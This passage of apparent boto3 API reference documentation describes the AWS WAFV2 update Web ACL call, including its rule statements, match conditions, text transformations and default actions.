'Type': 'NONE'|'COMPRESS_WHITE_SPACE'|'HTML_ENTITY_DECODE'|'LOWERCASE'|'CMD_LINE'|'URL_DECODE'
},
],
'PositionalConstraint': 'EXACTLY'|'STARTS_WITH'|'ENDS_WITH'|'CONTAINS'|'CONTAINS_WORD'
},
'SqliMatchStatement': {
'FieldToMatch': {
'SingleHeader': {
'Name': 'string'
},
'SingleQueryArgument': {
'Name': 'string'
},
'AllQueryArguments': {}
,
'UriPath': {}
,
'QueryString': {}
,
'Body': {}
,
'Method': {}
},
'TextTransformations': [
{
'Priority': 123,
'Type': 'NONE'|'COMPRESS_WHITE_SPACE'|'HTML_ENTITY_DECODE'|'LOWERCASE'|'CMD_LINE'|'URL_DECODE'
},
]
},
'XssMatchStatement': {
'FieldToMatch': {
'SingleHeader': {
'Name': 'string'
},
'SingleQueryArgument': {
'Name': 'string'
},
'AllQueryArguments': {}
,
'UriPath': {}
,
'QueryString': {}
,
'Body': {}
,
'Method': {}
},
'TextTransformations': [
{
'Priority': 123,
'Type': 'NONE'|'COMPRESS_WHITE_SPACE'|'HTML_ENTITY_DECODE'|'LOWERCASE'|'CMD_LINE'|'URL_DECODE'
},
]
},
'SizeConstraintStatement': {
'FieldToMatch': {
'SingleHeader': {
'Name': 'string'
},
'SingleQueryArgument': {
'Name': 'string'
},
'AllQueryArguments': {}
,
'UriPath': {}
,
'QueryString': {}
,
'Body': {}
,
'Method': {}
},
'ComparisonOperator': 'EQ'|'NE'|'LE'|'LT'|'GE'|'GT',
'Size': 123,
'TextTransformations': [
{
'Priority': 123,
'Type': 'NONE'|'COMPRESS_WHITE_SPACE'|'HTML_ENTITY_DECODE'|'LOWERCASE'|'CMD_LINE'|'URL_DECODE'
},
]
},
'GeoMatchStatement': {
'CountryCodes': [
'AF'|'AX'|'AL'|'DZ'|'AS'|'AD'|'AO'|'AI'|'AQ'|'AG'|'AR'|'AM'|'AW'|'AU'|'AT'|'AZ'|'BS'|'BH'|'BD'|'BB'|'BY'|'BE'|'BZ'|'BJ'|'BM'|'BT'|'BO'|'BQ'|'BA'|'BW'|'BV'|'BR'|'IO'|'BN'|'BG'|'BF'|'BI'|'KH'|'CM'|'CA'|'CV'|'KY'|'CF'|'TD'|'CL'|'CN'|'CX'|'CC'|'CO'|'KM'|'CG'|'CD'|'CK'|'CR'|'CI'|'HR'|'CU'|'CW'|'CY'|'CZ'|'DK'|'DJ'|'DM'|'DO'|'EC'|'EG'|'SV'|'GQ'|'ER'|'EE'|'ET'|'FK'|'FO'|'FJ'|'FI'|'FR'|'GF'|'PF'|'TF'|'GA'|'GM'|'GE'|'DE'|'GH'|'GI'|'GR'|'GL'|'GD'|'GP'|'GU'|'GT'|'GG'|'GN'|'GW'|'GY'|'HT'|'HM'|'VA'|'HN'|'HK'|'HU'|'IS'|'IN'|'ID'|'IR'|'IQ'|'IE'|'IM'|'IL'|'IT'|'JM'|'JP'|'JE'|'JO'|'KZ'|'KE'|'KI'|'KP'|'KR'|'KW'|'KG'|'LA'|'LV'|'LB'|'LS'|'LR'|'LY'|'LI'|'LT'|'LU'|'MO'|'MK'|'MG'|'MW'|'MY'|'MV'|'ML'|'MT'|'MH'|'MQ'|'MR'|'MU'|'YT'|'MX'|'FM'|'MD'|'MC'|'MN'|'ME'|'MS'|'MA'|'MZ'|'MM'|'NA'|'NR'|'NP'|'NL'|'NC'|'NZ'|'NI'|'NE'|'NG'|'NU'|'NF'|'MP'|'NO'|'OM'|'PK'|'PW'|'PS'|'PA'|'PG'|'PY'|'PE'|'PH'|'PN'|'PL'|'PT'|'PR'|'QA'|'RE'|'RO'|'RU'|'RW'|'BL'|'SH'|'KN'|'LC'|'MF'|'PM'|'VC'|'WS'|'SM'|'ST'|'SA'|'SN'|'RS'|'SC'|'SL'|'SG'|'SX'|'SK'|'SI'|'SB'|'SO'|'ZA'|'GS'|'SS'|'ES'|'LK'|'SD'|'SR'|'SJ'|'SZ'|'SE'|'CH'|'SY'|'TW'|'TJ'|'TZ'|'TH'|'TL'|'TG'|'TK'|'TO'|'TT'|'TN'|'TR'|'TM'|'TC'|'TV'|'UG'|'UA'|'AE'|'GB'|'US'|'UM'|'UY'|'UZ'|'VU'|'VE'|'VN'|'VG'|'VI'|'WF'|'EH'|'YE'|'ZM'|'ZW',
]
},
'RuleGroupReferenceStatement': {
'ARN': 'string',
'ExcludedRules': [
{
'Name': 'string'
},
]
},
'IPSetReferenceStatement': {
'ARN': 'string'
},
'RegexPatternSetReferenceStatement': {
'ARN': 'string',
'FieldToMatch': {
'SingleHeader': {
'Name': 'string'
},
'SingleQueryArgument': {
'Name': 'string'
},
'AllQueryArguments': {}
,
'UriPath': {}
,
'QueryString': {}
,
'Body': {}
,
'Method': {}
},
'TextTransformations': [
{
'Priority': 123,
'Type': 'NONE'|'COMPRESS_WHITE_SPACE'|'HTML_ENTITY_DECODE'|'LOWERCASE'|'CMD_LINE'|'URL_DECODE'
},
]
},
'RateBasedStatement': {
'Limit': 123,
'AggregateKeyType': 'IP',
'ScopeDownStatement': {'... recursive ...'}
},
'AndStatement': {
'Statements': [
{'... recursive ...'},
]
},
'OrStatement': {
'Statements': [
{'... recursive ...'},
]
},
'NotStatement': {
'Statement': {'... recursive ...'}
},
'ManagedRuleGroupStatement': {
'VendorName': 'string',
'Name': 'string',
'ExcludedRules': [
{
'Name': 'string'
},
]
}
},
'Action': {
'Block': {}
,
'Allow': {}
,
'Count': {}
},
'OverrideAction': {
'Count': {}
,
'None': {}
},
'VisibilityConfig': {
'SampledRequestsEnabled': True|False,
'CloudWatchMetricsEnabled': True|False,
'MetricName': 'string'
}
},
],
VisibilityConfig={
'SampledRequestsEnabled': True|False,
'CloudWatchMetricsEnabled': True|False,
'MetricName': 'string'
},
LockToken='string'
)
:type Name: string
:param Name: [REQUIRED]\nThe name of the Web ACL. You cannot change the name of a Web ACL after you create it.\n
:type Scope: string
:param Scope: [REQUIRED]\nSpecifies whether this is for an AWS CloudFront distribution or for a regional application. A regional application can be an Application Load Balancer (ALB) or an API Gateway stage.\nTo work with CloudFront, you must also specify the Region US East (N. Virginia) as follows:\n\nCLI - Specify the Region when you use the CloudFront scope: --scope=CLOUDFRONT --region=us-east-1 .\nAPI and SDKs - For all calls, use the Region endpoint us-east-1.\n\n
:type Id: string
:param Id: [REQUIRED]\nThe unique identifier for the Web ACL. This ID is returned in the responses to create and list commands. You provide it to operations like update and delete.\n
:type DefaultAction: dict
:param DefaultAction: [REQUIRED]\nThe action to perform if none of the Rules contained in the WebACL match.\n\nBlock (dict) --Specifies that AWS WAF should block requests by default.\n\nAllow (dict) --Specifies that AWS WAF should allow requests by default.\n\n\n
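For instance, a Web ACL whose rules only block known-bad traffic would typically use an allow default, while an allow-listing Web ACL would use a block default; a minimal sketch (the variable name is arbitrary):

# Allow any request that no rule matches; the rules then block the exceptions.
default_action = {'Allow': {}}
# Alternatively, block anything that no rule explicitly allows:
# default_action = {'Block': {}}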
:type Description: string
:param Description: A description of the Web ACL that helps with identification. You cannot change the description of a Web ACL after you create it.
:type Rules: list
:param Rules: The Rule statements used to identify the web requests that you want to allow, block, or count. Each rule includes one top-level statement that AWS WAF uses to identify matching web requests, and parameters that govern how AWS WAF handles them.\n\n(dict) --\nNote\nThis is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .\n\nA single rule, which you can use in a WebACL or RuleGroup to identify web requests that you want to allow, block, or count. Each rule includes one top-level Statement that AWS WAF uses to identify matching web requests, and parameters that govern how AWS WAF handles them.\n\nName (string) -- [REQUIRED]The name of the rule. You can\'t change the name of a Rule after you create it.\n\nPriority (integer) -- [REQUIRED]If you define more than one Rule in a WebACL , AWS WAF evaluates each request against the Rules in order based on the value of Priority . AWS WAF processes rules with lower priority first. The priorities don\'t need to be consecutive, but they must all be different.\n\nStatement (dict) -- [REQUIRED]The AWS WAF processing statement for the rule, for example ByteMatchStatement or SizeConstraintStatement .\n\nByteMatchStatement (dict) --A rule statement that defines a string match search for AWS WAF to apply to web requests. The byte match statement provides the bytes to search for, the location in requests that you want AWS WAF to search, and other settings. The bytes to search for are typically a string that corresponds with ASCII characters. In the AWS WAF console and the developer guide, this is refered to as a string match statement.\n\nSearchString (bytes) -- [REQUIRED]A string value that you want AWS WAF to search for. AWS WAF searches only in the part of web requests that you designate for inspection in FieldToMatch . The maximum length of the value is 50 bytes.\nValid values depend on the component that you specify for inspection in FieldToMatch :\n\nMethod : The HTTP method that you want AWS WAF to search for. This indicates the type of operation specified in the request.\nUriPath : The value that you want AWS WAF to search for in the URI path, for example, /images/daily-ad.jpg .\n\nIf SearchString includes alphabetic characters A-Z and a-z, note that the value is case sensitive.\n\nIf you\'re using the AWS WAF API\nSpecify a base64-encoded version of the value. The maximum length of the value before you base64-encode it is 50 bytes.\nFor example, suppose the value of Type is HEADER and the value of Data is User-Agent . If you want to search the User-Agent header for the value BadBot , you base64-encode BadBot using MIME base64-encoding and include the resulting value, QmFkQm90 , in the value of SearchString .\n\nIf you\'re using the AWS CLI or one of the AWS SDKs\nThe value that you want AWS WAF to search for. The SDK automatically base64 encodes the value.\n\nFieldToMatch (dict) -- [REQUIRED]The part of a web request that you want AWS WAF to inspect. For more information, see FieldToMatch .\n\nSingleHeader (dict) --Inspect a single header. Provide the name of the header to inspect, for example, User-Agent or Referer . This setting isn\'t case sensitive.\n\nName (string) -- [REQUIRED]The name of the query header to inspect.\n\n\n\nSingleQueryArgument (dict) --Inspect a single query argument. Provide the name of the query argument to inspect, such as UserName or SalesRegion . 
The name can be up to 30 characters long and isn\'t case sensitive.\nThis is used only to indicate the web request component for AWS WAF to inspect, in the FieldToMatch specification.\n\nName (string) -- [REQUIRED]The name of the query argument to inspect.\n\n\n\nAllQueryArguments (dict) --Inspect all query arguments.\n\nUriPath (dict) --Inspect the request URI path. This is the part of a web request that identifies a resource, for example, /images/daily-ad.jpg .\n\nQueryString (dict) --Inspect the query string. This is the part of a URL that appears after a ? character, if any.\n\nBody (dict) --Inspect the request body, which immediately follows the request headers. This is the part of a request that contains any additional data that you want to send to your web server as the HTTP request body, such as data from a form.\nNote that only the first 8 KB (8192 bytes) of the request body are forwarded to AWS WAF for inspection by the underlying host service. If you don\'t need to inspect more than 8 KB, you can guarantee that you don\'t allow additional bytes in by combining a statement that inspects the body of the web request, such as ByteMatchStatement or RegexPatternSetReferenceStatement , with a SizeConstraintStatement that enforces an 8 KB size limit on the body of the request. AWS WAF doesn\'t support inspecting the entire contents of web requests whose bodies exceed the 8 KB limit.\n\nMethod (dict) --Inspect the HTTP method. The method indicates the type of operation that the request is asking the origin to perform.\n\n\n\nTextTransformations (list) -- [REQUIRED]Text transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection. If you specify one or more transformations in a rule statement, AWS WAF performs all transformations on the content of the request component identified by FieldToMatch , starting from the lowest priority setting, before inspecting the content for a match.\n\n(dict) --\nNote\nThis is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .\n\nText transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection.\n\nPriority (integer) -- [REQUIRED]Sets the relative processing order for multiple transformations that are defined for a rule statement. AWS WAF processes all transformations, from lowest priority to highest, before inspecting the transformed content. 
The priorities don\'t need to be consecutive, but they must all be different.\n\nType (string) -- [REQUIRED]You can specify the following transformation types:\n\nCMD_LINE\nWhen you\'re concerned that attackers are injecting an operating system command line command and using unusual formatting to disguise some or all of the command, use this option to perform the following transformations:\n\nDelete the following characters: ' \' ^\nDelete spaces before the following characters: / (\nReplace the following characters with a space: , ;\nReplace multiple spaces with one space\nConvert uppercase letters (A-Z) to lowercase (a-z)\n\n\nCOMPRESS_WHITE_SPACE\nUse this option to replace the following characters with a space character (decimal 32):\n\nf, formfeed, decimal 12\nt, tab, decimal 9\nn, newline, decimal 10\nr, carriage return, decimal 13\nv, vertical tab, decimal 11\nnon-breaking space, decimal 160\n\n\nCOMPRESS_WHITE_SPACE also replaces multiple spaces with one space.HTML_ENTITY_DECODE\n\nUse this option to replace HTML-encoded characters with unencoded characters. HTML_ENTITY_DECODE performs the following operations:\n\nReplaces (ampersand)quot; with '\nReplaces (ampersand)nbsp; with a non-breaking space, decimal 160\nReplaces (ampersand)lt; with a 'less than' symbol\nReplaces (ampersand)gt; with >\nReplaces characters that are represented in hexadecimal format, (ampersand)#xhhhh; , with the corresponding characters\nReplaces characters that are represented in decimal format, (ampersand)#nnnn; , with the corresponding characters\n\n\nLOWERCASE\nUse this option to convert uppercase letters (A-Z) to lowercase (a-z).\n\nURL_DECODE\nUse this option to decode a URL-encoded value.\n\nNONE\nSpecify NONE if you don\'t want any text transformations.\n\n\n\n\n\nPositionalConstraint (string) -- [REQUIRED]The area within the portion of a web request that you want AWS WAF to search for SearchString . Valid values include the following:\n\nCONTAINS\nThe specified part of the web request must include the value of SearchString , but the location doesn\'t matter.\n\nCONTAINS_WORD\nThe specified part of the web request must include the value of SearchString , and SearchString must contain only alphanumeric characters or underscore (A-Z, a-z, 0-9, or _). In addition, SearchString must be a word, which means that both of the following are true:\n\nSearchString is at the beginning of the specified part of the web request or is preceded by a character other than an alphanumeric character or underscore (_). Examples include the value of a header and ;BadBot .\nSearchString is at the end of the specified part of the web request or is followed by a character other than an alphanumeric character or underscore (_), for example, BadBot; and -BadBot; .\n\n\nEXACTLY\nThe value of the specified part of the web request must exactly match the value of SearchString .\n\nSTARTS_WITH\nThe value of SearchString must appear at the beginning of the specified part of the web request.\n\nENDS_WITH\nThe value of SearchString must appear at the end of the specified part of the web request.\n\n\n\nSqliMatchStatement (dict) --Attackers sometimes insert malicious SQL code into web requests in an effort to extract data from your database. To allow or block web requests that appear to contain malicious SQL code, create one or more SQL injection match conditions. An SQL injection match condition identifies the part of web requests, such as the URI or the query string, that you want AWS WAF to inspect. 
Later in the process, when you create a web ACL, you specify whether to allow or block requests that appear to contain malicious SQL code.\n\nFieldToMatch (dict) -- [REQUIRED]The part of a web request that you want AWS WAF to inspect. For more information, see FieldToMatch .\n\nSingleHeader (dict) --Inspect a single header. Provide the name of the header to inspect, for example, User-Agent or Referer . This setting isn\'t case sensitive.\n\nName (string) -- [REQUIRED]The name of the query header to inspect.\n\n\n\nSingleQueryArgument (dict) --Inspect a single query argument. Provide the name of the query argument to inspect, such as UserName or SalesRegion . The name can be up to 30 characters long and isn\'t case sensitive.\nThis is used only to indicate the web request component for AWS WAF to inspect, in the FieldToMatch specification.\n\nName (string) -- [REQUIRED]The name of the query argument to inspect.\n\n\n\nAllQueryArguments (dict) --Inspect all query arguments.\n\nUriPath (dict) --Inspect the request URI path. This is the part of a web request that identifies a resource, for example, /images/daily-ad.jpg .\n\nQueryString (dict) --Inspect the query string. This is the part of a URL that appears after a ? character, if any.\n\nBody (dict) --Inspect the request body, which immediately follows the request headers. This is the part of a request that contains any additional data that you want to send to your web server as the HTTP request body, such as data from a form.\nNote that only the first 8 KB (8192 bytes) of the request body are forwarded to AWS WAF for inspection by the underlying host service. If you don\'t need to inspect more than 8 KB, you can guarantee that you don\'t allow additional bytes in by combining a statement that inspects the body of the web request, such as ByteMatchStatement or RegexPatternSetReferenceStatement , with a SizeConstraintStatement that enforces an 8 KB size limit on the body of the request. AWS WAF doesn\'t support inspecting the entire contents of web requests whose bodies exceed the 8 KB limit.\n\nMethod (dict) --Inspect the HTTP method. The method indicates the type of operation that the request is asking the origin to perform.\n\n\n\nTextTransformations (list) -- [REQUIRED]Text transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection. If you specify one or more transformations in a rule statement, AWS WAF performs all transformations on the content of the request component identified by FieldToMatch , starting from the lowest priority setting, before inspecting the content for a match.\n\n(dict) --\nNote\nThis is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .\n\nText transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection.\n\nPriority (integer) -- [REQUIRED]Sets the relative processing order for multiple transformations that are defined for a rule statement. AWS WAF processes all transformations, from lowest priority to highest, before inspecting the transformed content. 
The priorities don\'t need to be consecutive, but they must all be different.\n\nType (string) -- [REQUIRED]You can specify the following transformation types:\n\nCMD_LINE\nWhen you\'re concerned that attackers are injecting an operating system command line command and using unusual formatting to disguise some or all of the command, use this option to perform the following transformations:\n\nDelete the following characters: ' \' ^\nDelete spaces before the following characters: / (\nReplace the following characters with a space: , ;\nReplace multiple spaces with one space\nConvert uppercase letters (A-Z) to lowercase (a-z)\n\n\nCOMPRESS_WHITE_SPACE\nUse this option to replace the following characters with a space character (decimal 32):\n\nf, formfeed, decimal 12\nt, tab, decimal 9\nn, newline, decimal 10\nr, carriage return, decimal 13\nv, vertical tab, decimal 11\nnon-breaking space, decimal 160\n\n\nCOMPRESS_WHITE_SPACE also replaces multiple spaces with one space.HTML_ENTITY_DECODE\n\nUse this option to replace HTML-encoded characters with unencoded characters. HTML_ENTITY_DECODE performs the following operations:\n\nReplaces (ampersand)quot; with '\nReplaces (ampersand)nbsp; with a non-breaking space, decimal 160\nReplaces (ampersand)lt; with a 'less than' symbol\nReplaces (ampersand)gt; with >\nReplaces characters that are represented in hexadecimal format, (ampersand)#xhhhh; , with the corresponding characters\nReplaces characters that are represented in decimal format, (ampersand)#nnnn; , with the corresponding characters\n\n\nLOWERCASE\nUse this option to convert uppercase letters (A-Z) to lowercase (a-z).\n\nURL_DECODE\nUse this option to decode a URL-encoded value.\n\nNONE\nSpecify NONE if you don\'t want any text transformations.\n\n\n\n\n\n\n\nXssMatchStatement (dict) --A rule statement that defines a cross-site scripting (XSS) match search for AWS WAF to apply to web requests. XSS attacks are those where the attacker uses vulnerabilities in a benign website as a vehicle to inject malicious client-site scripts into other legitimate web browsers. The XSS match statement provides the location in requests that you want AWS WAF to search and text transformations to use on the search area before AWS WAF searches for character sequences that are likely to be malicious strings.\n\nFieldToMatch (dict) -- [REQUIRED]The part of a web request that you want AWS WAF to inspect. For more information, see FieldToMatch .\n\nSingleHeader (dict) --Inspect a single header. Provide the name of the header to inspect, for example, User-Agent or Referer . This setting isn\'t case sensitive.\n\nName (string) -- [REQUIRED]The name of the query header to inspect.\n\n\n\nSingleQueryArgument (dict) --Inspect a single query argument. Provide the name of the query argument to inspect, such as UserName or SalesRegion . The name can be up to 30 characters long and isn\'t case sensitive.\nThis is used only to indicate the web request component for AWS WAF to inspect, in the FieldToMatch specification.\n\nName (string) -- [REQUIRED]The name of the query argument to inspect.\n\n\n\nAllQueryArguments (dict) --Inspect all query arguments.\n\nUriPath (dict) --Inspect the request URI path. This is the part of a web request that identifies a resource, for example, /images/daily-ad.jpg .\n\nQueryString (dict) --Inspect the query string. This is the part of a URL that appears after a ? character, if any.\n\nBody (dict) --Inspect the request body, which immediately follows the request headers. 
This is the part of a request that contains any additional data that you want to send to your web server as the HTTP request body, such as data from a form.\nNote that only the first 8 KB (8192 bytes) of the request body are forwarded to AWS WAF for inspection by the underlying host service. If you don\'t need to inspect more than 8 KB, you can guarantee that you don\'t allow additional bytes in by combining a statement that inspects the body of the web request, such as ByteMatchStatement or RegexPatternSetReferenceStatement , with a SizeConstraintStatement that enforces an 8 KB size limit on the body of the request. AWS WAF doesn\'t support inspecting the entire contents of web requests whose bodies exceed the 8 KB limit.\n\nMethod (dict) --Inspect the HTTP method. The method indicates the type of operation that the request is asking the origin to perform.\n\n\n\nTextTransformations (list) -- [REQUIRED]Text transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection. If you specify one or more transformations in a rule statement, AWS WAF performs all transformations on the content of the request component identified by FieldToMatch , starting from the lowest priority setting, before inspecting the content for a match.\n\n(dict) --\nNote\nThis is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .\n\nText transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection.\n\nPriority (integer) -- [REQUIRED]Sets the relative processing order for multiple transformations that are defined for a rule statement. AWS WAF processes all transformations, from lowest priority to highest, before inspecting the transformed content. The priorities don\'t need to be consecutive, but they must all be different.\n\nType (string) -- [REQUIRED]You can specify the following transformation types:\n\nCMD_LINE\nWhen you\'re concerned that attackers are injecting an operating system command line command and using unusual formatting to disguise some or all of the command, use this option to perform the following transformations:\n\nDelete the following characters: ' \' ^\nDelete spaces before the following characters: / (\nReplace the following characters with a space: , ;\nReplace multiple spaces with one space\nConvert uppercase letters (A-Z) to lowercase (a-z)\n\n\nCOMPRESS_WHITE_SPACE\nUse this option to replace the following characters with a space character (decimal 32):\n\nf, formfeed, decimal 12\nt, tab, decimal 9\nn, newline, decimal 10\nr, carriage return, decimal 13\nv, vertical tab, decimal 11\nnon-breaking space, decimal 160\n\n\nCOMPRESS_WHITE_SPACE also replaces multiple spaces with one space.HTML_ENTITY_DECODE\n\nUse this option to replace HTML-encoded characters with unencoded characters. 
HTML_ENTITY_DECODE performs the following operations:\n\nReplaces (ampersand)quot; with '\nReplaces (ampersand)nbsp; with a non-breaking space, decimal 160\nReplaces (ampersand)lt; with a 'less than' symbol\nReplaces (ampersand)gt; with >\nReplaces characters that are represented in hexadecimal format, (ampersand)#xhhhh; , with the corresponding characters\nReplaces characters that are represented in decimal format, (ampersand)#nnnn; , with the corresponding characters\n\n\nLOWERCASE\nUse this option to convert uppercase letters (A-Z) to lowercase (a-z).\n\nURL_DECODE\nUse this option to decode a URL-encoded value.\n\nNONE\nSpecify NONE if you don\'t want any text transformations.\n\n\n\n\n\n\n\nSizeConstraintStatement (dict) --A rule statement that compares a number of bytes against the size of a request component, using a comparison operator, such as greater than (>) or less than (<). For example, you can use a size constraint statement to look for query strings that are longer than 100 bytes.\nIf you configure AWS WAF to inspect the request body, AWS WAF inspects only the first 8192 bytes (8 KB). If the request body for your web requests never exceeds 8192 bytes, you can create a size constraint condition and block requests that have a request body greater than 8192 bytes.\nIf you choose URI for the value of Part of the request to filter on, the slash (/) in the URI counts as one character. For example, the URI /logo.jpg is nine characters long.\n\nFieldToMatch (dict) -- [REQUIRED]The part of a web request that you want AWS WAF to inspect. For more information, see FieldToMatch .\n\nSingleHeader (dict) --Inspect a single header. Provide the name of the header to inspect, for example, User-Agent or Referer . This setting isn\'t case sensitive.\n\nName (string) -- [REQUIRED]The name of the query header to inspect.\n\n\n\nSingleQueryArgument (dict) --Inspect a single query argument. Provide the name of the query argument to inspect, such as UserName or SalesRegion . The name can be up to 30 characters long and isn\'t case sensitive.\nThis is used only to indicate the web request component for AWS WAF to inspect, in the FieldToMatch specification.\n\nName (string) -- [REQUIRED]The name of the query argument to inspect.\n\n\n\nAllQueryArguments (dict) --Inspect all query arguments.\n\nUriPath (dict) --Inspect the request URI path. This is the part of a web request that identifies a resource, for example, /images/daily-ad.jpg .\n\nQueryString (dict) --Inspect the query string. This is the part of a URL that appears after a ? character, if any.\n\nBody (dict) --Inspect the request body, which immediately follows the request headers. This is the part of a request that contains any additional data that you want to send to your web server as the HTTP request body, such as data from a form.\nNote that only the first 8 KB (8192 bytes) of the request body are forwarded to AWS WAF for inspection by the underlying host service. If you don\'t need to inspect more than 8 KB, you can guarantee that you don\'t allow additional bytes in by combining a statement that inspects the body of the web request, such as ByteMatchStatement or RegexPatternSetReferenceStatement , with a SizeConstraintStatement that enforces an 8 KB size limit on the body of the request. AWS WAF doesn\'t support inspecting the entire contents of web requests whose bodies exceed the 8 KB limit.\n\nMethod (dict) --Inspect the HTTP method. 
The method indicates the type of operation that the request is asking the origin to perform.\n\n\n\nComparisonOperator (string) -- [REQUIRED]The operator to use to compare the request part to the size setting.\n\nSize (integer) -- [REQUIRED]The size, in byte, to compare to the request part, after any transformations.\n\nTextTransformations (list) -- [REQUIRED]Text transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection. If you specify one or more transformations in a rule statement, AWS WAF performs all transformations on the content of the request component identified by FieldToMatch , starting from the lowest priority setting, before inspecting the content for a match.\n\n(dict) --\nNote\nThis is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .\n\nText transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection.\n\nPriority (integer) -- [REQUIRED]Sets the relative processing order for multiple transformations that are defined for a rule statement. AWS WAF processes all transformations, from lowest priority to highest, before inspecting the transformed content. The priorities don\'t need to be consecutive, but they must all be different.\n\nType (string) -- [REQUIRED]You can specify the following transformation types:\n\nCMD_LINE\nWhen you\'re concerned that attackers are injecting an operating system command line command and using unusual formatting to disguise some or all of the command, use this option to perform the following transformations:\n\nDelete the following characters: ' \' ^\nDelete spaces before the following characters: / (\nReplace the following characters with a space: , ;\nReplace multiple spaces with one space\nConvert uppercase letters (A-Z) to lowercase (a-z)\n\n\nCOMPRESS_WHITE_SPACE\nUse this option to replace the following characters with a space character (decimal 32):\n\nf, formfeed, decimal 12\nt, tab, decimal 9\nn, newline, decimal 10\nr, carriage return, decimal 13\nv, vertical tab, decimal 11\nnon-breaking space, decimal 160\n\n\nCOMPRESS_WHITE_SPACE also replaces multiple spaces with one space.HTML_ENTITY_DECODE\n\nUse this option to replace HTML-encoded characters with unencoded characters. 
HTML_ENTITY_DECODE performs the following operations:\n\nReplaces (ampersand)quot; with '\nReplaces (ampersand)nbsp; with a non-breaking space, decimal 160\nReplaces (ampersand)lt; with a 'less than' symbol\nReplaces (ampersand)gt; with >\nReplaces characters that are represented in hexadecimal format, (ampersand)#xhhhh; , with the corresponding characters\nReplaces characters that are represented in decimal format, (ampersand)#nnnn; , with the corresponding characters\n\n\nLOWERCASE\nUse this option to convert uppercase letters (A-Z) to lowercase (a-z).\n\nURL_DECODE\nUse this option to decode a URL-encoded value.\n\nNONE\nSpecify NONE if you don\'t want any text transformations.\n\n\n\n\n\n\n\nGeoMatchStatement (dict) --A rule statement used to identify web requests based on country of origin.\n\nCountryCodes (list) --An array of two-character country codes, for example, [ 'US', 'CN' ] , from the alpha-2 country ISO codes of the ISO 3166 international standard.\n\n(string) --\n\n\n\n\nRuleGroupReferenceStatement (dict) --A rule statement used to run the rules that are defined in a RuleGroup . To use this, create a rule group with your rules, then provide the ARN of the rule group in this statement.\nYou cannot nest a RuleGroupReferenceStatement , for example for use inside a NotStatement or OrStatement . It can only be referenced as a top-level statement within a rule.\n\nARN (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the entity.\n\nExcludedRules (list) --The names of rules that are in the referenced rule group, but that you want AWS WAF to exclude from processing for this rule statement.\n\n(dict) --\nNote\nThis is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .\n\nSpecifies a single rule to exclude from the rule group. Excluding a rule overrides its action setting for the rule group in the web ACL, setting it to COUNT . This effectively excludes the rule from acting on web requests.\n\nName (string) -- [REQUIRED]The name of the rule to exclude.\n\n\n\n\n\n\n\nIPSetReferenceStatement (dict) --A rule statement used to detect web requests coming from particular IP addresses or address ranges. To use this, create an IPSet that specifies the addresses you want to detect, then use the ARN of that set in this statement. To create an IP set, see CreateIPSet .\nEach IP set rule statement references an IP set. You create and maintain the set independent of your rules. This allows you to use the single set in multiple rules. When you update the referenced set, AWS WAF automatically updates all rules that reference it.\n\nARN (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the IPSet that this statement references.\n\n\n\nRegexPatternSetReferenceStatement (dict) --A rule statement used to search web request components for matches with regular expressions. To use this, create a RegexPatternSet that specifies the expressions that you want to detect, then use the ARN of that set in this statement. A web request matches the pattern set rule statement if the request component matches any of the patterns in the set. To create a regex pattern set, see CreateRegexPatternSet .\nEach regex pattern set rule statement references a regex pattern set. You create and maintain the set independent of your rules. This allows you to use the single set in multiple rules. 
When you update the referenced set, AWS WAF automatically updates all rules that reference it.\n\nARN (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the RegexPatternSet that this statement references.\n\nFieldToMatch (dict) -- [REQUIRED]The part of a web request that you want AWS WAF to inspect. For more information, see FieldToMatch .\n\nSingleHeader (dict) --Inspect a single header. Provide the name of the header to inspect, for example, User-Agent or Referer . This setting isn\'t case sensitive.\n\nName (string) -- [REQUIRED]The name of the query header to inspect.\n\n\n\nSingleQueryArgument (dict) --Inspect a single query argument. Provide the name of the query argument to inspect, such as UserName or SalesRegion . The name can be up to 30 characters long and isn\'t case sensitive.\nThis is used only to indicate the web request component for AWS WAF to inspect, in the FieldToMatch specification.\n\nName (string) -- [REQUIRED]The name of the query argument to inspect.\n\n\n\nAllQueryArguments (dict) --Inspect all query arguments.\n\nUriPath (dict) --Inspect the request URI path. This is the part of a web request that identifies a resource, for example, /images/daily-ad.jpg .\n\nQueryString (dict) --Inspect the query string. This is the part of a URL that appears after a ? character, if any.\n\nBody (dict) --Inspect the request body, which immediately follows the request headers. This is the part of a request that contains any additional data that you want to send to your web server as the HTTP request body, such as data from a form.\nNote that only the first 8 KB (8192 bytes) of the request body are forwarded to AWS WAF for inspection by the underlying host service. If you don\'t need to inspect more than 8 KB, you can guarantee that you don\'t allow additional bytes in by combining a statement that inspects the body of the web request, such as ByteMatchStatement or RegexPatternSetReferenceStatement , with a SizeConstraintStatement that enforces an 8 KB size limit on the body of the request. AWS WAF doesn\'t support inspecting the entire contents of web requests whose bodies exceed the 8 KB limit.\n\nMethod (dict) --Inspect the HTTP method. The method indicates the type of operation that the request is asking the origin to perform.\n\n\n\nTextTransformations (list) -- [REQUIRED]Text transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection. If you specify one or more transformations in a rule statement, AWS WAF performs all transformations on the content of the request component identified by 